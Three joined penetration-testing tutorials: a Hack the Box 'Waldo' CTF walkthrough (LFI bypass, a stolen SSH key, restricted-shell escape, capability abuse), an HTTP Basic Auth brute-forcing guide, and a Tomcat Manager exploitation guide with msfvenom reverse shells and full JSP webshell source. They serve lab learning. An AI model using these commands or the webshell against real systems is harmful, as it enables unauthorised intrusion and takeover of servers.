Hack the Box: Waldo Walkthrough

Today we are going to solve another CTF challenge “waldo”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of waldo is 10.10.10.87

Penetrating Methodology

·         Network scanning (Nmap)

·         Browsing IP address through HTTP

·         Exploiting LFI Vulnerability

·         Finding RSA private key through LFI

·         Login through SSH using RSA private key

·         Escaping restricted shell

·         Using Linux “Capabilities” to read root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV -sC -T4 10.10.10.87

The Nmap output shows us that there are 4 ports open: 22(SSH), 80(HTTP)

We find that port 80 is running http, so we open the IP in our browser.

We find that we were redirected to /list.html. On the webpage we find that it was an application for list manager. We capture its request using burpsuite and find that it is listing the files in the current directory.

We try to find the application is vulnerable to LFI. We remove “list” to list the files in the current directory and find a file called “fileRead.php”. Enumerating the web application, we found that “dirRead.php” can only be used to read contents of a directory and they cannot be used to take read files. So as we the name suggests “fileRead.php” we use this page to read files.

We use “fileRead.php” to read /etc/passwd. We change the variable from “path” to “file” and use the following string to bypass the filter:

./….//….//….//….//etc//passwd

When we check the /etc/passwd file we find a user with a distinctive UID and GID called “nobody”.

We check the home directory using “dirRead.php” and find a directory called “nobody”. We take a look inside “/home/nobody” and find the directory called “.ssh”. As “.ssh” might contain RSA private key for SSH login, we take a look inside it.

We take a look inside “/home/nobody/.ssh/” and find a file called “.monitor”.

We read the “.monitor” file inside “/home/nobody/.ssh” using “fileRead.php” and find RSA private key.

The response is in JSON format with special characters in between the characters of RSA private key. We use this site here, to decode the JSON response into string.

We copy the RSA private key and save it in our system to login through SSH using this key.

We change the permission for the key and login as user “nobody”, as we are unable to login as “monitor”.

chmod 600 id_rsa

ssh -i id_rsa nobody@10.10.10.87

Then we take a look at the home directory and find a file called “user.txt”. We take a look at the content of the file and find the first flag.

Enumerating the system we go into “.ssh” directory and check the authorized_keys file to find monitor user is allowed to login. As we were unable to login as monitor from the external system, we now try to login as user “monitor” internally using the RSA private key “.monitor”.

ssh -i .monitor monitor@localhost

After logging in as user “monitor” we find that we have a restricted shell.

echo $SHELL

echo $PATH

We are not able to change the PATH and SHELL variable, so we use “-t” argument to spawn a TTY shell while logging through SSH. After spawning a TTY shell we are able to change the SHELL and PATH environment variables.

ssh -i .monitor monitor@localhost -t bash

export SHELL=/bin/bash

export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH

Then enumerating the system we don’t find anything in particular. Enumerating further we find that this machine contains “capabilities”. Now Linux “capabilities” are like suid that can give certain file special privileges.  We can find them using binary called “getcap”. Now we recursively search for files using getcap and find a binary called “tac” that can read files.  Now using “tac” we open root.txt inside root directory and find the final flag.

getcap -r / 2>/dev/null

tac /root/root.txt

Multiple Ways To Exploit HTTP Authentication

In this article, we will learn about how to configure the password protected Apache Web Server to restrict from online visitors without validation so that we can hide some essential and critical information to the un-authenticated users and how to penetrate it’s the weak configuration to breach its security and exploit it.

Table of Content

Introduction to HTTP Basic Authentication

§  Lab Set_up Requirement

Set Up Password Authentication

§  Installing the Apache Utilities Package

§  Creating the Password File

§  Configuring Access Control inside the Virtual Host Definition

§  Configuring Access Control with .htaccess Files

§  Confirm the Password Authentication

Exploiting HTTP Authentication

§  xHydra

§  Hydra

§  Ncrack

§  Mdeusa

§  Metasploit

§  Burpsuite

Introduction to HTTP Basic Authentication

In the context of a HTTP transaction, basic access authentication is a method for a HTTP user agent to provide a user name and password when making a request.

HTTP Basic authentication (BA) implementation is the simplest technique for enforcing access controls to web resources because it doesn’t require cookies, session identifiers, or login pages; rather, HTTP Basic authentication uses standard fields in the HTTP header, obviating the need for handshakes.

The BA mechanism provides no confidentiality protection for the transmitted credentials. They are merely encoded with Base64 in transit, but not encrypted or hashed in any way. HTTPS is, therefore, typically preferred used in conjunction with Basic Authentication.

For more details read from wikipedia.org

Lab Set_up Requirement

Apache Server (Ubuntu 14.04)

Penetration Testing Machine (Kali Linux)

Set Up Password Authentication

Installing the Apache Utilities Package

Let’s start with following command to install an Apache2 utility package called ‘htpasswd’. The htpasswd is used to create and update the flat-files used to store usernames and password for basic authentication of HTTP users.

sudo apt-get install apache2 apache2-utils

Creating the Password File

Now use htpasswd command to create a password file that Apache will use to authenticate users and use a hidden file “.htpasswd” in our /etc/apache2 configuration directory to store password.

sudo htpasswd -c /etc/apache2/.htpasswd raj

cat /etc/apache2/.htpasswd

gedit etc/apache2/sites-enabled/000-default.conf

Configuring Access Control inside the Virtual Host Definition

Now saved the following configuration in 000-default.conf file.

        AuthType Basic

        AuthName "Restricted Content"

        AuthUserFile /etc/apache2/.htpasswd

        Require valid-user

   

Configuring Access Control with .htaccess Files

Open the main Apache configuration file to enable password protection using .htaccess files and add following line as highlighted.

sudo gedit /etc/apache2/apache2.conf

ServerName localhost

Enable .htaccess processing by changing the AllowOverride directive "None" to "All" in the block for the /var/www directory and then save the file and restart the apache service.

    Options Indexes FollowSymLinks

    AllowOverride All

    Require all granted

Next, you need to add an .htaccess file to the directory you wish to restrict. Here, I want restrict the entire website which is could be through /var/www/html, but you can place this file in any directory where you wish to restrict access:

sudo nano /var/www/html/.htaccess

AuthType Basic

AuthName "Restricted Content"

AuthUserFile /etc/apache2/.htpasswd

Require valid-user

sudo service apache2 restart

While configuring .htaccess file we had added few options for the block directory. Let’s see what these configuration denotes.

AuthType Basic: This will set up a basic authentication for our site.

AuthName “Restricted Contents”: This will show the name of the authentication at the prompt.

AuthUserFile /etc/apache2/.htpasswd : This will show the location of the authentication file.

Require Valid-user: This will be used by one user who has confirmed their authentication who are permitted to access the website.

Confirm the Password Authentication

Try to access your restricted content in a web browser to confirm that your content is protected. I will be accessible with a username and password prompt that looks like this:

If you will try to access the website without authentication or canceled the Required Authentication page then it will displace 401 error Unauthorized Access.

If you are valid users and try to access password protected website by using valid credential, for example we had create an account with raj: 123 to access apache http service.

As you can observe that, now we are able to access the content of website.

Exploiting HTTP Authentication

xHydra

This is the graphical version to apply dictionary attack via FTP port to hack a system. For this method to work:

Open xHydra in your kali. And select Single Target option and their give the IP of your victim PC. And select HTTP in box against Protocol option and give the port number 80 against the port option.

Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.

Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L user.txt -P pass.txt 192.168.0.105 http-get

-L: denotes path for username list

-P:  denotes path for password list

Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.

Run the following command

ncrack -U user.txt -P pass.txt http://192.168.0.105

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

medusa  -h 192.168.0.105 -U user.txt -P pass.txt -M http -f

Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the HTTP username as raj and password as 123.

Metasploit

This module attempts to authenticate to an HTTP service. Open Kali terminal type msfconsole and then type: 

use auxiliary/scanner/http/http_login

msf auxiliary(scanner/http/http_login) > set user_file  user.txt

msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt

msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105

msf auxiliary(scanner/http/http_login) >  set stop_on_success

msf auxiliary(scanner/http/http_login) > exploit

Burp Suite

Now here I had just typed the random value for authentication in order to fetch the request through burp suite. So before you sent the request to server turn on the burp suite and select proxy tab then, click on the intercept is on after then send the user authentication by clicking ok

Thus the sent request will be captured by burp suite which you can see in the given below image. In the screenshot I had highlighted some value in the last line. Here it tells the type of authentication provided is basic and if you have read above theory of basic authentication I had described that it is encoded in base 64.

Now time to generate the encoded value for authentication inside the burp suite. Click on action tab select send to intruder for HTTP Fuzzing attack.

Now open intruder frame and click on the position. Configure the position where payload will be inserted into the request. The attack type determines the way in which the payload assigned to payload position. Now select “the encoded value of authentication” for payload position and click to ADD button on the left side of the frame.

The base64 encoded value of Authentication is a combination of username and password now the scenario is to generate the same encoded value of authentication with the help of user password dictionary Therefore, I have made a dictionary which contains both user password names in a text file.

In order to use dictionary as payload click on payload tab under intruder; now load your dictionary which contains user password names from payload options.

But we want to send a request in the encoded value of our payload. To encode your payload click on ADD button available under payload processing.

 A new dialog box will generate to select the rule choose an encode option from the list; now select base 64 from drag down list of URL encode key character for payload processing.

This will start a brute force attack and try to match string for user authentication. In the screenshot you can observe the status “200 OK” and length “11788”of the highlighted value is different from rest of the values. This means we can use this encoded value to bypass the user authentication, which occur from request number 5. Now check the username and password on 5th line in the dictionary. In the dictionary I found raj: 123 have matching authentication.

Or you can also use this encoded Auth value to bypass the apache http authentication page via burp suite intercepted data.

Copy the above auth value and paste replace it with intercepted authorization a shown in below and forward the request to access restricted content.

Booom!!! Here we have successfully access the content of website.

Hope you people have enjoy this article and learnt how weak configuration security can easily breach and unauthorized person can access the restrict content of your website.

Multiple Ways to Exploit Tomcat Manager

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manger Application” if you have default login credential (tomcat: tomcat).  While playing CTF, many times I found Apache Tomcat is running in target machine that have configured with default login and this can help us to get remote machine shell. Therefore I feel, I should write all possible ways to exploit tomcat manger application to gaining webshell of remote machine.

Table of Content

§  Tomcat Manager Authenticated Upload Code Execution

§  Generate .war Format Backdoor

§  Tomcat War Deployer Script

§  Generate a JSP Webshell

Let’s start with nmap scan and to tomcat service check port 8080 as tomcat.

nmap -sV -p8080 192.168.1.101

From nmap output result, we found port 8080 is open for Apache Tomcat. So we navigate to web browser and on exploring Target IP: port we saw HTTP authentication page to login in tomcat manger application.

Tomcat Manager Authenticated Upload Code Execution

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.101

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword tomcat

msf exploit(multi/http/tomcat_mgr_upload) > exploit

As result you can observe that, we have meterpreter session of the target machine.

Generate .war Format Backdoor

We can use msfvenom for generating a .war format backdoor for java/jsp payload, all you need to do is just follow the given below syntax to create .war format file and then run netcat listener.

Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=1234 -f war > shell.war

nc -lvp 1234

Now login to tomcat manager application using tomcat: tomcat as username: password. You will be welcomed by admin dashboard where you can upload a .war file. 

As you can observe I had browser the malicious shell.war file to be deploy as highlighted in the image. As soon as you will upload your file, you will saw the /path entry for your file in the table of Applications.

To execute your .war file, you have to click on the /.war file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.

As soon as you will execute your file you will get reverse connection through netcat.

Booom!!! One more time we have access remote webshell.

Tomcat War Deployer Script

This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary).

In practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love tomcat:tomcat ).

You can download it from here: https://github.com/mgeeky/tomcatWarDeployer

git clone https://github.com/mgeeky/tomcatWarDeployer

 cd tomcatWarDeployer

ls

Now follow the syntax to exploit the target machine without uploading .war file manually.

Syntax : ./tomcatWarDeployer.py -U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port] [target_IP]:[tomcat_port]

./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080

On executing above command, I got webshell directly as you can observe it in the given below image.

Generate a JSP Webshell

In this part, we are going to see how we can generate and deploy a Webshell to gain command execution on the Tomcat manger application.

First, we will need to write the Webshell and package it as a .war file format. To write the jsp Webshell, we are using the following code which I found from from this Link: https://pentesterlab.com/exercises/cve-2007-1860/course

<%@ page import="java.io.*" %>

<%

   String cmd = request.getParameter("cmd");

   String output = "";

   if(cmd != null) {

      String s = null;

      try {

         Process p = Runtime.getRuntime().exec(cmd,null,null);

         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));

         while((s = sI.readLine()) != null) { output += s+""; }

      }  catch(IOException e) {   e.printStackTrace();   }

   }

%>

<%=output %>

Save the code as index.jsp and then execute following command to package it as .war file.

mkdir webshell

cp index.jsp webshell/

cd webshell

jar -cvf ../webshell.war *

With the help of above command you will get a war file, which you can deploy in tomcat manger application.

As you can observe from the given below image, I had deployed my webshell.war file which successfully uploaded, now let’s click on this file for its execution.

On executing /webshell you will get a HTTP 404 error, now execute index.jsp file in the as given below:

http://192.168.1.106:8080/webshell/index.jsp

On executing above URL you will get command execution form, now use it wisely to cmd commands.

Hopefully! You have enjoyed this article how to get access to the Tomcat manager using CVE-2007-1860